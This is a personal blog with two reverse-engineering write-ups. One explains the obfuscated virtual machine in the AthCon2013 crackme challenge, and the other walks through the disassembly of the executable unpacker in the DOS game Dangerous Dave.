Dany's 'blog

Monday, June 17, 2013

AthCon2013 RE challenge - part 1

Just came back from AthCon2013, where the organizers were generous enough to give me a free ticket for solving this year's reverse-engineeing challenge.
In all fairness, I was not the first to solve the challenge, but a mere 3rd. I'll try to find the names of all the people who solved the challenge and post them here.
The challenge was written by Kyriakos Economou & Nikolaos Tsapakis (check out their blog "The A.R.F. Project"), great job guys!
For anyone who's interesting following the writeup with the challenge or just giving it a go yourself, it's available here.
As the challenge was a fairly interesting one, I thought I'd post a writeup.

SPOILER ALERT!!!

On running the EXE, you are greeted with a console window:

Which after closing, presents you with the following message-box containing the "bad-boy" message:

Inside the EXE, at the entry point (0x40107B) we find two function calls:

func@402CBC - This is the function that opens the console window and displays the greeting. Not very interesting.
func@401086 - Triggers a jump to 0x407730, where the real program starts.

So let's start dissecting that program:

00407730    pushf
00407731    push    esi  
00407732    call    $+5  
00407737    pop     esi  
00407738    sub     esi, 2Fh     
0040773B    push    eax  
0040773C    mov     eax, ebx     
0040773E    pop     dword ptr [esi]
00407740    add     eax, 24h     
00407743    push    ebx  
00407744    mov     ebx, ecx     
00407746    pop     dword ptr [esi+4]
00407749    add     ebx, 20h     
0040774C    push    ecx  
0040774D    mov     ecx, edx     
0040774F    pop     dword ptr [esi+8]
00407752    add     ecx, 8
00407755    push    edx  
00407756    mov     edx, esi     
00407758    pop     dword ptr [esi+0Ch]
0040775B    add     edx, 4
0040775E    mov     eax, esi     
00407760    push    eax  
00407761    pop     ebx  
00407762    pop     dword ptr [eax+10h]
00407765    add     ebx, 0Ch     
00407768    pop     dword ptr [esi+20h]
0040776B    push    edi  
0040776C    add     edi, eax     
0040776E    pop     dword ptr [eax+14h]
00407771    add     edi, 10h     
00407774    push    ebp  
00407775    add     ebp, edi     
00407777    pop     dword ptr [eax+18h]
0040777A    add     edi, 18h     
0040777D    push    esp  
0040777E    add     edi, 4
00407781    pop     dword ptr [eax+1Ch]
00407784    add     esi, 18h     
00407787    call    $+5  
0040778C    pop     edi  
0040778D    sub     edi, 18Ch    
00407793    mov     esi, [edi]   
00407795    xor     edi, edi     
00407797    mov     [eax+24h], esi

This (slightly obfuscated) code appears to save all the registers, to 0x407708 through 0x40772C. Let's name these addresses:

0x407708: _eax
0x40770C: _ebx
0x407710: _ecx
0x407714: _edx
0x407718: _esi
0x40771C: _edi
0x407720: _ebp
0x407724: _esp
0x407728: _eflags
0x40772C: _blob_ptr, contains the value 0x40CADE, which is an address to some binary data (tried disassembling - not code) within the EXE

0040779A    sub     esp, 800h    
004077A0    call    $+5  
004077A5    pop     edi  
004077A6    sub     edi, 79h     
004077A9    jmp     short @0x4077AC

This just loads edi with &_blob_ptr and jumps to 0x4077AC.

004077AC    mov     edi, [edi]      
004077AE    call    $+5  
004077B3    pop     esi             
004077B4    add     esi, 28C1h      
004077BA    xor     ebx, ebx        
004077BC    mov     ebp, esp        
004077BE    mov     ecx, edi        
004077C0    add     ecx, ebx     
004077C2    mov     esp, ecx        
004077C4    pop     edx             
004077C5    mov     esp, ebp        
004077C7    mov     ebp, esp     
004077C9    mov     ecx, esi        
004077CB    add     ecx, ebx     
004077CD    mov     esp, ecx        
004077CF    pop     ecx             
004077D0    mov     cl, dl
004077D2    push    ecx             
004077D3    mov     esp, ebp     
004077D5    inc     ebx  
004077D6    push    ebx  
004077D7    xor     ebx, 0Fh     
004077DA    pop     ebx  
004077DB    jz      short @0x4077DF
004077DD    jmp     short @0x4077BC
004077DF    ...

This is basically a loop (again, obfuscated, and I'll stop mentioning it now, as all the code is obfuscated) which copies 16 bytes from _blob_ptr to 0x40A074. Also, remember for later that esi ends up being set to 0x40A074, and this register will remain unchanged throughout the code.

004077DF    mov     ebp, esp     
004077E1    mov     edi, esi     
004077E3    mov     esp, edi     
004077E5    pop     ebx  
004077E6    mov     esp, ebp     
004077E8    mov     cl, bl
004077EA    mov     ebp, esp     
004077EC    mov     edi, esi     
004077EE    inc     edi  
004077EF    mov     esp, edi     
004077F1    pop     ebx  
004077F2    mov     esp, ebp     
004077F4    mov     bh, bl
004077F6    mov     bl, cl
004077F8    call    $+5  
004077FD    pop     edi  
004077FE    sub     edi, 0D1h    
00407804    xor     bl, 8Ah

This loads the byte at 0x40A074 to ebx and XORs it with 0x8A.
Also, note that edi now points to _blob_ptr.
OK, let's see what comes next:

00407807    push    ebx
00407808    pop     ecx
00407809    push    ecx
0040780A    xor     cl, 1Fh
0040780D    pushf
0040780E    add     al, 4
00407810    xor     al, 18h
00407812    pop     edx
00407813    pop     ebx
00407814    and     edx, 40h
00407817    jnz     short @0x407822

This is just a fancy way to check whether bl - i.e. the byte at 0x40A074 - i.e. the byte at _blob_ptr, XORed with 0x8A is equal to 0x1F. Let's follow that path:

00407822    push    ebx  
00407823    pop     ecx  
00407824    push    ecx  
00407825    xor     ch, 0E0h     
00407828    pushf
00407829    add     al, 4
0040782B    xor     al, 18h
0040782D    pop     edx  
0040782E    pop     ebx  
0040782F    and     edx, 40h     
00407832    jnz     @0x40A7FF

Now ch - i.e. bh - i.e. the second byte at 0x40A074 - i.e. the byte at _blob_ptr+1, is compared to 0xE0. Again, we swallow the bait:

0040A7FF    mov     edx, [edi-24h]
0040A802    push    eax  
0040A803    push    ebx  
0040A804    push    ecx  
0040A805    pop     ecx  
0040A806    pop     ebx  
0040A807    pop     eax  
0040A808    mov     [edi], edx   
0040A80A    jmp     @0x40A0CD

Ah, finally something interesting. Remember edi points to _blob_ptr? well, that means edi-0x24 points to _eax! And this piece of code copies _eax to _blob_ptr.
The jump takes us here:

0040A0CD    mov     ebx, eax     
0040A0CF    sub     ecx, 10h     
0040A0D2    sub     edx, 14h     
0040A0D5    add     esp, 400h    
0040A0DB    sub     esi, 18h     
0040A0DE    add     esp, 400h    
0040A0E4    sub     edi, 1Ch     
0040A0E7    jmp     @0x40779A

This code basically does nothing, because if we follow the jump, we loop back to where we started (here - add a # link to where we jump)
Interesting...let's try to take a look at another piece of code, supposing we took a different branch on the byte at _blob_ptr:

00407819    xor     cl, al
0040781B    pushf
0040781C    pop     edx  
0040781D    and     dl, 40h
00407820    jmp     0x40783F     
            ...
0040783F    push    ebx  
00407840    pop     ecx  
00407841    push    ecx  
00407842    xor     cl, 6Dh
00407845    pushf
00407846    add     al, 4
00407848    xor     al, 18h
0040784A    pop     edx  
0040784B    pop     ebx  
0040784C    and     edx, 40h     
0040784F    jnz     0x40785A     
            ...
0040785A    push    ebx  
0040785B    pop     ecx  
0040785C    push    ecx  
0040785D    xor     ch, 1
00407860    pushf
00407861    add     al, 4
00407863    xor     al, 18h
00407865    pop     edx  
00407866    pop     ebx  
00407867    and     edx, 40h     
0040786A    jnz     0x40A80F
            ...
0040A80F    mov     eax, [edi-4] 
0040A812    mov     ebx, [edi]   
0040A814    add     ebx, 2
0040A817    mov     cl, [ebx]    
0040A819    mov     edx, [edi-24h]
0040A81C    push    eax  
0040A81D    popf
0040A81E    shr     edx, cl
0040A820    pushf
0040A821    pop     edx  
0040A822    mov     [edi-4], edx 
0040A825    mov     [edi-24h], edx
0040A828    mov     eax, [edi]   
0040A82A    add     eax, 3
0040A82D    mov     [edi], eax   
0040A82F    jmp     0x40A0CD (go_to_start)

So, just to be on the same page, the path I took was:

_blob_ptr[0] ^ 0x8A != 0x1F
_blob_ptr[0] ^ 0x8A == 0x6D
_blob_ptr[1] == 0x01

And this brings us to that last piece of code. Again, remember edi = &_blob_ptr, this makes the code equivalent to:

eflags = _eflags;
edx = _eax;
edx <<= _blob_ptr[2];
_eflags = eflags;
_eax = edx;
_blob_ptr += 3;

Ahhh, so basically, _eax is SHRed by the byte at _blob_ptr[2], and then _blob_ptr is advanced by 3, which is just the amount of byte we just processed. This looks exactly as if those 3 bytes just defined a SHR instruction.
This is our moment of clarity.
All the underscored registers are actually a VM's register state, where _blob_ptr is the VM's eip, the BLOB is the bytecode, and the entire code we saw so far, is a single instruction cycle.
Now that we can name and role of all the variables and locations, we can decode all the instructions (there are quite a few of them and it takes a lot of patience, you can find the complete list in my repository link to github).
However, even if we do that, there's a small catch. Let's take a look at this little condition right there in the middle of the VM's switch:

0040803B    jnz     0x40BD7B ; PUSH IMM8 (with sign extend)
00408041    xor     cl, al
00408043    pushf 
00408044    pop     edx   
00408045    and     dl, 40h
00408048    push    ebx   
00408049    mov     ebx, [edi] 
0040804B    add     ebx, 1200h 
00408051    mov     bl, [ebx] 
00408053    cmp     bl, 1 
00408056    jnz     0x408145

This extra condition looks at *(vm_eip+0x1200). If it's 1, then we just continue with the switch. However, if it's 0, then we go to some special handling. One important thing to note before we continue, is that the bytecode is probably 0x1200 bytes long. Also, the jump target is also the "default" handler for the switch statement.

00408145    pop     ebx  
00408146    xor     bl, 8Ah
00408149    call    $+5  
0040814E    pop     eax  
0040814F    sub     eax, 0B46h   
00408154    xor     ecx, ecx     
          loop:
00408156    mov     ebp, esp     
00408158    mov     edi, eax     
0040815A    mov     esp, edi     
0040815C    pop     edx  
0040815D    mov     esp, ebp     
0040815F    cmp     bl, dl
00408161    jz      0x408167
00408163    inc     ecx  
00408164    inc     eax  
00408165    jmp     0x408156 (loop)

So we take vm_eip[0]^0x8A, and XOR it with 0x8A again, so we are left with so we are left with vm_eip[0] in bl.
Next, we scan what appears to be a 256-byte table at 0x407608 for vm_eip[0], and store the index in ecx.

00408167    mov     ebp, esp
00408169    mov     eax, esi
0040816B    mov     esp, eax
0040816D    pop     eax
0040816E    mov     al, cl
00408170    push    eax
00408171    mov     esp, ebp

If we recall that esi points to area to which those 16 bytes copied from the bytecode, we see that the first byte is replaced by the index found in the previous loop. In effect, the first byte of the current opcode is passed through a map.
Let's just call this area with the 16 bytes of bytecode the staging area.

00408173    call    $+5
00408178    pop     eax
00408179    add     eax, 1E4Bh ; eax = 0x409FC3
0040817E    push    0
00408180    push    esi
00408181    push    eax
00408182    push    ebp
00408183    sub     esp, 27h
00408186    mov     ebp, esp
00408188    push    ecx
00408189    push    edx
0040818A    push    esi
0040818B    call    0x409210

The stack is prepared so that when entering the function at 0x409210, the stack would look like this:

Now, armed with this visual aid, we can take a look at the function at 0x409210:

00409210    pop     esi
00409211    push    dword ptr [ebp+2Fh]
00409214    pop     dword ptr [ebp+23h]
00409217    mov     byte ptr [ebp+22h], 0
0040921B    mov     dword ptr [ebp+2], 20h
00409222    mov     dword ptr [ebp+6], 20h
00409229    cmp     dword ptr [ebp+33h], 40h
0040922D    jnz     0x409236 (label1)
0040922F    mov     dword ptr [ebp+6], 40h
00409236 label1:
00409236    mov     eax, [ebp+23h]
00409239    movzx   ecx, byte ptr [eax]
0040923C    lea     eax, [esi+ecx*4]
0040923F    add     eax, [eax]
00409241    add     eax, 4
00409244    call    eax
00409246    cmp     eax, 0FFFFFFFFh
00409249    jz      0x409251 (label2)
0040924B    mov     eax, [ebp+23h]
0040924E    sub     eax, [ebp+2Fh]
00409251 label2:
00409251    pop     esi
00409252    pop     edx
00409253    pop     ecx
00409254    add     esp, 27h
00409257    pop     ebp
00409258    retn    8

That tangle of code, actually does something very simple. I'll break it down:

Note that ebp+0x33 contains 0, which means that the first branch will always be taken.
esi swallows the function's return address.
The first push-pop pair puts the staging area's pointer in ebp+0x23.
The first byte in the staging area then serves as an index to some function table that starts at esi - now the address right after the current function's call.
On a return value different from -1 (which I can only imagine to be a failure of the looked-up function), eax will contain the difference between ebp+0x2F and ebp+0x23 (Odd...didn't we say the contain the same value?)
Finally, the stack is unwound in a way, that on executing ret, the flow returns to code_ptr1=0x409FC3.

The only visible side effects are whatever the function at the table did, and the result stored in eax. I have a feeling the two are connected.
So we have two questions now, 1) What's at 0x409FC3? and 2) What do the functions in that table do?.
Starting with the second question, I'll pick for example the 5th entry in the table: 0x409308.

00409308    add     dword ptr [ebp+23h], 2
0040930C    retn

Well, combined with what we know the previous function does, this just result in eax containing 2 when the program's flow continues at 0x409FC3:

00409FC3    call    $+5
00409FC8    pop     edi
00409FC9    add     edi, 0ACh

Now edi points to the staging area.

00409FCF    xor     ecx, ecx
00409FD1    mov     ecx, 0Fh
00409FD6    sub     ecx, eax
00409FD8    sub     ecx, 2
00409FDB    add     edi, eax

Advance edi by look_up_func_result. And load ecx with 15-look_up_func_result-2.

00409FDD    push    ebx
00409FDE    mov     ebp, esp
00409FE0    mov     ebx, edi
00409FE2    mov     esp, ebx
00409FE4    pop     ebx
00409FE5    mov     bl, 0EBh
00409FE7    push    ebx

Store 0xEB at staging_area+look_up_func_result.

00409FE8    mov     esp, ebp
00409FEA    pop     ebx
00409FEB    push    ebx
00409FEC    mov     ebp, esp
00409FEE    mov     ebx, edi
00409FF0    inc     ebx
00409FF1    mov     esp, ebx
00409FF3    pop     ebx
00409FF4    mov     bl, cl
00409FF6    push    ebx

And store 15-look_up_func_result-2 at staging_area+look_up_func_result+1.
Very weird, let's see where this is going.

00409FF7    mov     esp, ebp
00409FF9    pop     ebx
00409FFA    jmp     0x40A00B (label1)
00409FFC    push    eax
00409FFD    pop     ebx
00409FFE    inc     ebx
00409FFF    push    ecx
0040A000    pop     edx
0040A001    inc     edx
0040A002    push    esi
0040A003    pop     edi
0040A004    inc     edi
0040A005    pop     esi
0040A006    pop     ebx
0040A007    pop     edx
0040A008    pop     eax
0040A009    leave
0040A00A    retn
0040A00B label1:
0040A00B    call    $+5
0040A010    pop     esi
0040A011    sub     esi, 14h
0040A014    add     esi, 0Eh
0040A017    inc     edi
0040A018    add     edi, ecx

So now esi=0x40A00A (which is the retn right before label1), and edi=staging_area+2+look_up_func_result+(15-look_up_func_result-2)=staging_area+15.

0040A01A loop:
0040A01A    push    ebx
0040A01B    mov     ebp, esp
0040A01D    mov     ebx, esi
0040A01F    mov     esp, ebx
0040A021    pop     edx
0040A022    mov     esp, ebp
0040A024    pop     ebx
0040A025    push    ebx
0040A026    mov     ebp, esp
0040A028    mov     ebx, edi
0040A02A    mov     esp, ebx
0040A02C    pop     ebx
0040A02D    mov     bl, dl
0040A02F    push    ebx
0040A030    mov     esp, ebp
0040A032    pop     ebx
0040A033    dec     esi
0040A034    dec     edi
0040A035    dec     cl
0040A037    jz      0x40A03B
0040A039    jmp     0x40A01A (loop)

This just copies backward ecx=15-look_up_func_result-2 bytes from 0x40A00A, to where edi points now in the staging area.

0040A03B    call    $+5
0040A040    pop     edi
0040A041    sub     edi, 2914h
0040A047    add     [edi], eax
0040A049    mov     ebx, [edi-24h]
0040A04C    mov     eax, [edi-24h]
0040A04F    mov     ecx, [edi-20h]
0040A052    mov     ebx, [edi-20h]
0040A055    mov     edx, [edi-14h]
0040A058    mov     ecx, [edi-1Ch]
0040A05B    mov     esi, [edi-0Ch]
0040A05E    mov     edx, [edi-18h]
0040A061    mov     ebp, [edi-8]
0040A064    mov     esi, [edi-14h]
0040A067    mov     ebp, [edi-0Ch]
0040A06A    mov     esp, [edi-8]
0040A06D    push    dword ptr [edi-4]
0040A070    popf
0040A071    mov     edi, [edi-10h]

If we calculate edi, then we'll see it's the address of vm_eip. Now it's easy to see that this just loads all the machine registers from the VM's registers.
And now we come, right in the middle of our program flow, to the staging area (?!).
So let's just pause right here, and try to think what the contents of the staging area should be at this point:

Originally, the staging area had 15 bytes of bytecode.
Then the first byte was translated via some table.
Then some value, X, was calculated based on running a function from some other table.
And then 0xEB and (13-X) were written in the middle.

This kind of looks like this:

Since the is now actually the code that gets executed, we can only guess, that what we have here is a native instruction which was "hidden" in the bytecode, followed by 0xEB, which if we look at the x86 opcode table, we see that it's actually the opcode for jmp rel8, where the jump would take us exactly beyond the staging area, right here:

0040A083    push    edi
0040A084    pushf
0040A085    sub     esp, 800h
0040A08B    call    $+5
0040A090    pop     edi
0040A091    sub     edi, 2964h
0040A097    add     esp, 800h
0040A09D    pop     dword ptr [edi-4]
0040A0A0    pop     dword ptr [edi-10h]
0040A0A3    mov     [edi-24h], eax
0040A0A6    mov     eax, [edi-8]
0040A0A9    mov     [edi-20h], ebx
0040A0AC    mov     ebx, [edi-14h]
0040A0AF    mov     [edi-1Ch], ecx
0040A0B2    mov     ecx, [edi-0Ch]
0040A0B5    mov     [edi-18h], edx
0040A0B8    mov     edx, ecx
0040A0BA    mov     [edi-14h], esi
0040A0BD    mov     esi, eax
0040A0BF    mov     [edi-0Ch], ebp
0040A0C2    mov     ebp, [edi-24h]
0040A0C5    mov     [edi-8], esp
0040A0C8    jmp     0x40779A (start_of_vm_cycle)

Which stores the resulting native machine state into the VM's state, and goes on to process the next VM instruction.
Now we understand that the function table is just a crooked way to encode the length of native instructions based on their opcode.
So to summarize:

We have a virtual machine whose state (all the standard registers) are stored at 0x407708 for eax, to 0x40772C for eip.
The VM's bytecode is 0x1200 bytes long and is at 0x40CADE.
In each cycle, 15 bytes of bytecode are copied to a staging area at 0x40A074.
The first byte of the current instruction is XORed with 0x8A, and serves as a switch parameter to the instruction's handler.
At a certain point in the switch, if no match has been found yet, a mask corresponding to the current instruction (current VM eip + 0x1200) is tested to decide wheather to continue oescending the switch, or to fall to default.
The default handler is native execution of the bytecode, but opcode must first be decoded by looking-up the table at 0x407608, and the corresponding instruction length is calculated using the functions in the table at 0x409FC3.

You can find the disassembler code here, I'm warning you, it ain't pretty, but it gets the job done.
Now we can look at what the machine is trying to do. But that's for next time.

Friday, December 7, 2012

Reverse engineering Dangerous Dave: Packaging

I've been looking to take on a reverse-engineering project, as a means to practice the skill, for quite some time now.

I needed something simple, but not trivial. Old DOS games seemed like a nice option, since they are mostly small and not very complex, yet the challenge will still be real.
Now, Dangerous Dave is one of the most ubiquitous games out there, it has been around since the late 80's, and as such, it will be small enough for me to undertake as a first project.

Opening the file using the freeware version of IDA Pro, I got informed that the file is possibly a packed file. This means I should expect a big lump of data and some bootstrapping code that would unpack that data into executable code.

For the sake of exercise, I want to try tackling the disassembly of the unpacker using freely available tools.

Starting with the EXE header (for additional reference on EXE, a.k.a MZ, file structure you can check out http://www.tavi.co.uk/sdos/exeformat.html).
Let's look at a hex dump of the header:

$ xxd DAVE.EXE |head
0000000: 4d5a 2a01 9600 0000 0200 e31c ffff 3e2a  MZ*...........>*
0000010: 8000 0000 0e00 9812 1c00 0000 4c5a 3931  ............LZ91
0000020: ffff ba4d 252e 8916 3502 b430 cd21 8b2e  ...M%...5..0.!..
0000030: 02ff ff00 8b1e 2c00 8eda a390 008c 068e  ......,.........
0000040: 0089 1ef0 1f8a fc2e a600 e83d 01c4 3e88  ...........=..>.
0000050: feff e4c7 8bd8 b9ff 7ffc f2ae e361 4326  .............aC&
0000060: 38ff e105 75f6 80cd 80f7 d989 0ee5 b901  8...u...........
0000070: ff10 00d3 e383 c308 83e3 f8cb 8cfe 7fc3  ................
0000080: da2b ea8b 3ebe 4b81 ff00 0273 07bf 48ff  .+..>.K....s..H.
0000090: fb89 f3c7 129f 7228 033e ff1f b24b 7222  ......r(.>...Kr"

The field which are of interest are:

Header paragraphs = 2
This is where the actual "program" starts in the file, i.e. this is the the start of the image that will be loaded into memory by the DOS loader.
Initial CS = 0x1298
This is the segment address where that code will start executing
Initial IP = 0xE
This is the offset within the above segment where the loader will jump once the file has been loaded into memory.

Using these 3 parameters I we can calculate the offset of the program's entry point in terms of offset from the start of the EXE file.
One thing to notice though, is that the initial IP is not 0, meaning there might be some data in the code segment.
Anyway, to find the offset of the code segment within the file, we need to skip the header which occupies 2 paragraphs, and an additional CS (=0x1298) paragraphs. Each paragraph is 16 bytes long, resulting in a total offset of 2 * 16 + 0x1298 * 2 = 0x129A0 bytes.
To disassemble the code I will use nasm (http://www.nasm.us/). I want to start disassembling at offset 0x129A0 from the start of the file, and skip the first 0xE(=14) (allegedly) data bytes. The former is facilitated by the -e switch, and the latter by specifying a sync point using the -s switch (you can read all about the different switches here) like this:

$ ndisasm -b 16 -e129A0h -sEh
00000000  0000              add [bx+si],al
00000002  0000              add [bx+si],al
00000004  80003F            add byte [bx+si],0x3f
...

I will now go over each section I managed to identify in the executable and discuss it in detail.

Packed code

All the data from the 3rd (we have 2 header paragraphs) to the 1299th paragraph in the file. This is just one big chunk of data whose composition we do not yet now.

Unpacker data

Remember that there is a non 0 initial IP specified in the header? Well, that's because the first 14 bytes in the code segment are data:

$xxd DAVE.EXE |grep "129a0"
00129a0: 0000 0000 8000 3f2f 9812 8d17 8a01 060e  ......?/........

The only interesting observation which can be made here is that 9812 looks a lot like an little endian encoding of 0x1298 which is exactly the size of the packed code in paragraphs, so we can name it: word_0x8 = 0x1298 = packed code paragraphs.

Bootstrapping

This section itself is quite complex, and contains several parts, I will try to divide them logically.

$ ndisasm -b 16 -e129A0h -sEh
...
0000000E  06                push es

This line is a bit curious now, it pushes es into the stack. During the loading process, es is loaded with the address of the PSP segment. While the segment contains very interesting system information, the "real" importance of it in this context is that it is the segment of the program's base, because immediately following the PSP segment, the executable is loaded. This will be important later, so for now we need to remember that the address of the PSP segment is saved to the stack.

0000000F  0E                push cs
00000010  1F                pop ds
00000011  8B0E0C00          mov cx,[0xc]  ; word_0xc = 0x18a
00000015  8BF1              mov si,cx
00000017  4E                dec si
00000018  89F7              mov di,si
0000001A  8CDB              mov bx,ds
0000001C  031E0A00          add bx,[0xa]  ; word_0xa = 0x178d
00000020  8EC3              mov es,bx
00000022  FD                std
00000023  F3A4              rep movsb

Basically a memcpy of a chunk of 0x18a bytes from the beginning of the current segment, to some address located 0x178d paragraphs forward. This chunk is exactly the all code from the start of the segment to the end of the file, which means that the bootstrapping code itself is copied forward in memory to make room for the unpacked data.
One thing to notice is the method with which the code is copied. The addresses loaded into the source (ds:si) and destination (es:di) point to the end of the copied buffers, and the direction flag (DF) is set (by the std instruction) so after each movsb the si and di registers will decrease.
This means that when the copy loop has finished, es:di will point to the end of the free memory (just below the copy of the bootstrapping code) and ds:si will point to the end of the compressed code.
By the way, two words in the data section can now be named:

word_0xc = bootstrap code size
word_0xa = unpacked code paragraphs

00000025  53                push bx
00000026  B82B00            mov ax,0x2b
00000029  50                push ax
0000002A  CB                retf

This just pushes the new segment address of the copy of the bootstrap code (in bx), and then the offset 0x2b, making the retf serve as a far jump to bx:0x2b. Since there is no difference between the running code and its copy, we can just look at offset 0x2b in the current code to see where the program will continue execution.

0000002B  2E8B2E0800        mov bp,[cs:0x8]
00000030  8CDA              mov dx,ds
00000032  89E8              mov ax,bp
00000034  3D0010            cmp ax,0x1000
00000037  7603              jna 0x3c
00000039  B80010            mov ax,0x1000
0000003C  29C5              sub bp,ax
0000003E  29C2              sub dx,ax
00000040  29C3              sub bx,ax
00000042  8EDA              mov ds,dx
00000044  8EC3              mov es,bx
00000046  B103              mov cl,0x3
00000048  D3E0              shl ax,cl
0000004A  89C1              mov cx,ax
0000004C  D1E0              shl ax,1
0000004E  48                dec ax
0000004F  48                dec ax
00000050  8BF0              mov si,ax
00000052  8BF8              mov di,ax
00000054  F3A5              rep movsw
00000056  09ED              or bp,bp
00000058  75D8              jnz 0x32

Translated to C (almost, I will use segmented addressing notation), the code above will look like this:

paragraphs_left = compressed_code_paragraphs;
while (paragraphs_left > 0) {
    if (paragraphs_left < 0x1000) {
        paragraphs_to_copy = paragraphs_left;
    } else {
        paragraphs_to_copy = 0x1000;
    }
    paragraphs_left -= paragraphs_to_copy;
    source_segment -= paragraphs_to_copy;
    destination_segment -= paragraphs_to_copy;
    source_offset = destination_offset = paragraphs_to_copy * 16 - 1;
    words_to_copy = paragraphs_to_copy * 8;
    while (words_to_copy > 0) {
        *destination_segment:destination_offset = *source_segment:source_offset;
        destination_offset -= 2;
        source_offset -= 2;
        words_to_copy--;
    }
}

All this does is copy the packed code to the area adjacent and below the copy of the bootstrapping code.
The reason for copying in "chunks" is that you can only address 64KiB within a segment, that's 0x1000 paragraphs. So every 64KiB, the segment addressed of both the source and destination need to be readjusted.
After all the code/data is in place, the unpacking can begin.
First, make sure the source pointer points to the copy of the packed code, and the destination pointer points to the programs first segment (the beginning of the original packed code):

0000005B  8EC2              mov es,dx
0000005D  8EDB              mov ds,bx
0000005F  31F6              xor si,si
00000061  31FF              xor di,di

Now starts the unpacking routine. Because I don't want to paste a wall of code and then discuss its analysis, I will outline the unpacking algorithm, and then analyze small chunks of asm code to fill in the details.

Unpacker

The basic idea is that the packed code is composed of control data which comes in words, and regular data whose handling is specified by the control data.

00000063  BA1000            mov dx,0x10

So, dx is loaded with 16 (which is the number of bits in a word).

00000066  AD                lodsw
00000067  89C5              mov bp,ax

Then a word from the packed code is loaded into bp.

00000069  D1ED              shr bp,1
0000006B  4A                dec dx
0000006C  7505              jnz 0x73
0000006E  AD                lodsw
0000006F  89C5              mov bp,ax
00000071  B210              mov dl,0x10

This is a piece of code which will repeat a lot. What it does is shift the LSB of the control word into the CF, then update the remaining bits count (in dx) and if it has reached 0, the next control word is loaded into bp and the remaining bits count is reset.

00000073  7303              jnc 0x78
00000075  A4                movsb
00000076  EBF1              jmp short 0x69

This code actually handles the bit we pushed from the control word into the CF. If CF is set (control bit was 1) then copy a byte from the packed code to the unpacked code as-is and continue reading the next control bit. Otherwise (control bit was 0) continue with:

00000078  31C9              xor cx,cx

Reset cx.

0000007A  D1ED              shr bp,1
0000007C  4A                dec dx
0000007D  7505              jnz 0x84
0000007F  AD                lodsw
00000080  89C5              mov bp,ax
00000082  B210              mov dl,0x10

This should be familiar from before, just read the next bit and load a new word if needed.

00000084  7222              jc 0xa8

We will handle the case where the control bit is '1' later. If, however, the control bit was '0':

00000086  D1ED              shr bp,1
00000088  4A                dec dx
00000089  7505              jnz 0x90
0000008B  AD                lodsw
0000008C  89C5              mov bp,ax
0000008E  B210              mov dl,0x10

Load the next control bit into CF.

00000090  D1D1              rcl cx,1

And push it into cx (from right to left).

00000092  D1ED              shr bp,1
00000094  4A                dec dx
00000095  7505              jnz 0x9c
00000097  AD                lodsw
00000098  89C5              mov bp,ax
0000009A  B210              mov dl,0x10

Read another control bit

0000009C  D1D1              rcl cx,1

And shift it into cx too. So what we get in essence is the two control bits in reverse order in cx.

0000009E  41                inc cx
0000009F  41                inc cx

Add 2 to cx.

000000A0  AC                lodsb
000000A1  B7FF              mov bh,0xff
000000A3  8AD8              mov bl,al

Load the next byte from the packed code into bl, and put 0xff in bh. This will result in bx containing the signed (and negative) value of read_byte-256.

000000A5  E91300            jmp word 0xbb

Continue execution at:

000000BB  268A01            mov al,[es:bx+di]
000000BE  AA                stosb
000000BF  E2FA              loop 0xbb
000000C1  EBA6              jmp short 0x69

This is equivalent to:

while (cx-- > 0) {
    *destination_segment:destination_offset = *destination_segment:(destination_offset + bx);
    destination_offset++;
}

This code copies a chunk of cx bytes from already unpacked code (remember bx < 0) to the head of the unpacked code. This means that:

The byte that was loaded into bx represents an offset.
The two bits (+2) which were loaded into cx represents a length.

Let's recap before we continue.
The packed code is composed of control words, which are read bit-by bit from LSB to MSB.
If we encounter a 1, we copy the next byte in the packed code to the unpacked code as-is.
If we encounter two 0's in a row, we need to copy N+2 bytes from the current position in the unpacked data minus D, where N is the next two bits in the control, and D is the next byte in the packed code.
How about if we read a 0 and then a 1? Well, that's the case I said we'll do later.

000000A8  AD                lodsw
000000A9  8BD8              mov bx,ax

Read a word from the packed data into ax (and bx).

000000AB  B103              mov cl,0x3
000000AD  D2EF              shr bh,cl
000000AF  80CFE0            or bh,0xe0
000000B2  80E407            and ah,0x7

This code separates two values encoded into the word. The 3 least significant bits of the high byte are loaded into ax, while the remaining 5 most significant bits are shifted right. The "or bh,0xe0" causes bx to contain the signed (and negative) value of its former value - 8192.

000000B5  740C              jz 0xc3

We will handle the case in which ax turned out to be 0 later. If ax was not 0:

000000B7  88E1              mov cl,ah
000000B9  41                inc cx
000000BA  41                inc cx

Just sets cx to ax+2.

000000BB  268A01            mov al,[es:bx+di]
000000BE  AA                stosb
000000BF  E2FA              loop 0xbb
000000C1  EBA6              jmp short 0x69

This is the same copy loop we analyzed before. This means that the 3 least-significant bits in the high byte are an encoded length (-2), and the rest of the word, when recombined is the offset. Notice that in while in the previous case, the copied chunk's length was limited to 5 bytes, and the offset to 256, here the length is limited to 9 bytes, and the offset to 8192. How about that case in which the length we read is 0? Well:

000000C3  AC                lodsb

Read another byte from the packed code.

000000C4  08C0              or al,al
000000C6  7434              jz 0xfc
000000C8  3C01              cmp al,0x1
000000CA  7405              jz 0xd1

I'll cover the cases in which the read byte is 0 or 1 later.

000000CC  88C1              mov cl,al
000000CE  41                inc cx
000000CF  EBEA              jmp short 0xbb

If the read byte is bigger than 1, then load cx with that value + 1, and jump to the copying code. This means that the byte we read specified a length. Now let's handle the case in which that byte was 1:

000000D1  89FB              mov bx,di
000000D3  83E70F            and di,byte +0xf
000000D6  81C70020          add di,0x2000
000000DA  B104              mov cl,0x4
000000DC  D3EB              shr bx,cl
000000DE  8CC0              mov ax,es
000000E0  01D8              add ax,bx
000000E2  2D0002            sub ax,0x200
000000E5  8EC0              mov es,ax
000000E7  89F3              mov bx,si
000000E9  83E60F            and si,byte +0xf
000000EC  D3EB              shr bx,cl
000000EE  8CD8              mov ax,ds
000000F0  01D8              add ax,bx
000000F2  8ED8              mov ds,ax
000000F4  E972FF            jmp word 0x69

Remember that I mentioned earlier that we can't address more than 64KiB within a segment? Well, this limit could be reached while we are copying bytes to the uncompressed code. To avoid it, we need to readjust the segment addresses of both the source and destination segments. This is exactly what the code does, for each of the addresses, it adds the number of paragraphs which fit inside the offset to the segment address, and leaves the remainder in the offset. For example, if es:di = 0x1234:0x5678:

We can fit 0x567 paragraphs in 0x5678 bytes.
Add 0x567 to the segment address to obtain 0x179b
The remainder, 0x8, is left in the offset
The readjusted address is 0x179b:0x0008 is equivalent to 0x1234:0x5678 (you can check yourself by comparing the linear addresses), but the addressing limitation within the segment has been overcome.

This just leaves the last case of the read byte being 0. Well, that's the "end-of-stream" marker, which means the unpacking process is done.

